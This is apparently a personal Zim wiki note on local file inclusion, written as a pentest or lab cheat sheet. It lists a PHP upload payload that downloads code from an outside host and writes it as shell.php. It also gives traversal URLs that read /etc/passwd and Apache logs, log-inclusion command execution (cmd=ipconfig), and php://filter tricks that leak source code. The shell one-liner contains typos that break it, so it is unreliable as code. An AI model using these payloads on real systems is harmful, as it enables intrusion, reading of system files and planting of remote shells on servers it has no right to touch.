Content-Type: text/x-zim-wiki
Wiki-Format: zim 0.4
Creation-Date: 2020-05-15T05:17:11-04:00

====== LFI ======
Created Friday 15 May 2020

upload file from brupsuite
**<?php file_put_content('shell.php',file_get_content('http://10.2.4.148/php.php))?>**

local file inclusion

format ...
**http://10.10.22.71/article?name=../../../etc/passwd**

**view=../../../../etc/cat/../passwd&ext**
**?view=/var/log/apache2/cat/../access.log&ext**

**http://10.11.0.22/menu.php?file=c:\xampp\apache\logs\access.log&cmd=ipconfig**

**http://10.10.193.110/?view=php://filter/convert.base64-encode/cat/resource=index  (gives you index source code)**

**php://filter/convert.base64-encode/resource=../../../../../etc/passwd**


vunerable code in php

---$local_file=$_REQUEST["page"]
